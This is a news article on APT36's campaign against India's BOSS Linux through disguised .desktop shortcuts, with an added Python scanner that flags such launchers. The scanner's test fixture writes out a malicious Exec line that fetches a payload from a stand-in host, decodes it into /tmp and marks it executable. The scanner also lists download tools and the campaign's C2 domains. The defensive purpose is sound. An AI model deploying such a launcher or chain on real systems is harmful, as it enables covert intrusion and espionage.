According to researchers at CYFIRMA, this campaign, first observed in early August 2025, demonstrates a significant escalation in the group’s sophistication.
Traditionally reliant on Windows-based payloads and phishing documents, APT36 is now actively weaponizing BOSS-specific attack chains, a worrying development given the system’s widespread use across Indian government entities.
The attack commences through spear-phishing emails that deliver a compressed archive, concealing a malicious .desktop file disguised as an official government notice.
When opened, the file executes stealthy command sequences that initiate the download and execution of a hidden binary, while simultaneously presenting the victim with a harmless PDF decoy to maintain the illusion of legitimacy.
The centerpiece of the campaign is the .desktop file, crafted to resemble a legitimate PDF shortcut but laced with commands in its Exec field.
Once launched, it leverages utilities such as curl and xxd to fetch a hex-encoded payload from the attacker infrastructure, decode it into binary form, store it under /tmp, and activate it in the background, with execution rights silently granted via chmod.
This mechanism ensures the malware runs covertly, without presenting any visible terminal window. To secure persistence, the attackers exploit autostart entries that re-trigger the payload each time the user logs in.
Static analysis of the retrieved ELF executable reveals a Go-based binary with obfuscated headers and missing section names, traits commonly associated with packed or tampered malware.
More alarmingly, dynamic examination uncovered its reliance on systemd services and cron jobs for long-term persistence, alongside communication with a command-and-control node hosted at “modgovindia[.]space” on port 4000.
Additional infrastructure, including the newly registered domain “securestore[.]cv”, has been identified as part of the delivery chain, reinforcing the assessment of a coordinated state-backed operation.
This latest campaign underscores a deliberate and evolving strategy by APT36 to infiltrate India’s technological backbone.
By expanding its toolkit to compromise BOSS Linux specifically, the group aims to undermine trust in homegrown operating systems deployed across defense, diplomatic, and critical administrative structures.
Researchers warn that the ability to run cross-platform espionage operations magnifies the potential for sustained access and data theft.
For Indian institutions, the implications are severe, as reliance on spear-phishing combined with Linux-specific persistence allows attackers to bypass traditional security controls that remain heavily tuned toward Windows environments.
CYFIRMA’s findings highlight the pressing need to revise defense-in-depth models, incorporating Linux-capable endpoint detection, stricter execution controls over untrusted shortcut files, and proactive blocking of known malicious domains.
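The "stricter execution controls over untrusted shortcut files" recommended here, and the .desktop abuse pattern described earlier (an Exec field that chains curl, xxd and chmod through /tmp, a document-like Name, Terminal=false, and placement in an autostart directory), can be turned into a simple host check. The following is an added example written for this article, not code from CYFIRMA or from the report; the heuristics, the scoring threshold and both sample .desktop files are constructed for illustration, and the sample's download URL uses the reserved `.invalid` domain so it cannot resolve. The denylist holds the two defanged domains quoted in the article.

```python
"""Flag XDG .desktop launchers that match the download-decode-chmod pattern."""
import re
from pathlib import Path

# Constructed heuristics derived from the campaign description above.
SUSPICIOUS_TOOLS = ("curl", "wget", "xxd", "base64", "chmod")
TMP_PATHS = re.compile(r"/(tmp|dev/shm|var/tmp)/")
DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")
# Domains quoted (defanged) in the report; refanged for substring matching.
KNOWN_BAD_DOMAINS = tuple(d.replace("[.]", ".") for d in ("modgovindia[.]space", "securestore[.]cv"))


def parse_desktop_entry(text: str) -> dict:
    """Return the key=value pairs of the [Desktop Entry] group (minimal XDG parser)."""
    entries, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip()] = value.strip()
    return entries


def matches_known_domain(command: str) -> bool:
    """True if the command string references a domain from the report's denylist."""
    lowered = command.lower()
    return any(domain in lowered for domain in KNOWN_BAD_DOMAINS)


def assess_desktop_entry(entries: dict, location: str = "") -> list:
    """Return human-readable findings for one parsed .desktop entry."""
    findings = []
    exec_line = entries.get("Exec", "")
    lowered = exec_line.lower()
    name = entries.get("Name", "")

    tools = [t for t in SUSPICIOUS_TOOLS if re.search(rf"\b{t}\b", lowered)]
    if tools:
        findings.append("Exec invokes download/decode/permission tools: " + ", ".join(tools))
    if TMP_PATHS.search(exec_line):
        findings.append("Exec writes to or runs from a world-writable temp directory")
    if any(sep in exec_line for sep in ("|", ";", "&&")):
        findings.append("Exec chains several commands in one launcher")
    if re.search(r"\b(ba)?sh\b", lowered) and "-c" in exec_line:
        hidden = entries.get("Terminal", "false").lower() == "false"
        findings.append("Exec spawns an inline shell command" + (" with Terminal=false, so no window is shown" if hidden else ""))
    if name.lower().endswith(DOC_EXTENSIONS):
        findings.append(f"Name masquerades as a document: {name}")
    if matches_known_domain(exec_line):
        findings.append("Exec references a domain from the report's denylist")
    if "autostart" in location:
        findings.append("entry lives in an autostart directory (persistence on login)")
    return findings


def is_suspicious(findings: list) -> bool:
    """Two or more independent indicators is the constructed alert threshold."""
    return len(findings) >= 2


def scan_directory(directory: Path) -> dict:
    """Map each flagged .desktop path under `directory` to its findings."""
    results = {}
    for path in directory.glob("*.desktop"):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        findings = assess_desktop_entry(parse_desktop_entry(text), str(path))
        if is_suspicious(findings):
            results[str(path)] = findings
    return results


# Constructed fixtures: a launcher shaped like the campaign's, and a benign one.
MALICIOUS_SAMPLE = """[Desktop Entry]
Type=Application
Name=Government_Notice.pdf
Icon=application-pdf
Exec=bash -c "curl -s http://attacker.invalid/n.hex | xxd -r -p > /tmp/.notice && chmod +x /tmp/.notice"
Terminal=false
"""

BENIGN_SAMPLE = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Terminal=false
"""

if __name__ == "__main__":
    # Check the usual autostart locations plus where mail attachments land.
    for d in (Path.home() / ".config/autostart", Path("/etc/xdg/autostart"),
              Path.home() / "Downloads", Path.home() / "Desktop"):
        for path, findings in scan_directory(d).items():
            print(path)
            for f in findings:
                print("  -", f)
```

The parser deliberately ignores other groups (such as Desktop Action groups) and only reads the main group, which is where Exec and Terminal live; a production check would also want to alert on any .desktop file written to an autostart directory by a non-package process, which is an EDR-level signal this script cannot see.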
APT36’s consistent focus on India reflects broader geopolitical motives, with each new iteration of its tactics reinforcing the necessity of a vigilant and adaptive security posture.
The post Indian BOSS Linux Under Siege – APT36 Exploits Malicious .desktop Shortcuts appeared first on Cyber Security News.